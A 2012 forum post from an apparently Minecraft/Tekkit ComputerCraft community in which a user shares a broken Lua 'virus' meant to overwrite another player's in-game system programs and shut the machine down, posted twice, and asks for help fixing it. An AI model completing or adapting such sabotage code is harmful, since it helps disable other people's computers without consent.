Posted 10 July 2012 - 03:07 AM
This is supposed to be a virus file where the virus shuts down and doesn't allow the computer to do main functions, even with a simple antivirus program. This was planned to be used on one of my friends who is just starting tekkit but it is coming up with the access denied message. Please help!
Here's the code
print("I'm a virus :)/>/>")
fs.copy("disk/startup", "rom/programs/startup")
fs.copy(disk/delete, rom/programs/delete)
fs.copy(disk/edit, rom/programs/edit)
fs.copy(disk/lua, rom/programs/lua)
fs.copy(disk/move, rom/programs/move)
fs.copy(disk/rename, rom/programs/rename)
fs.copy(disk/shell, rom/programs/shell)
print("Bye, Bye")
sleep(1)
os.shutdown()
Here's the code
print("I'm a virus :)/>/>")
fs.copy("disk/startup", "rom/programs/startup")
fs.copy(disk/delete, rom/programs/delete)
fs.copy(disk/edit, rom/programs/edit)
fs.copy(disk/lua, rom/programs/lua)
fs.copy(disk/move, rom/programs/move)
fs.copy(disk/rename, rom/programs/rename)
fs.copy(disk/shell, rom/programs/shell)
print("Bye, Bye")
sleep(1)
os.shutdown()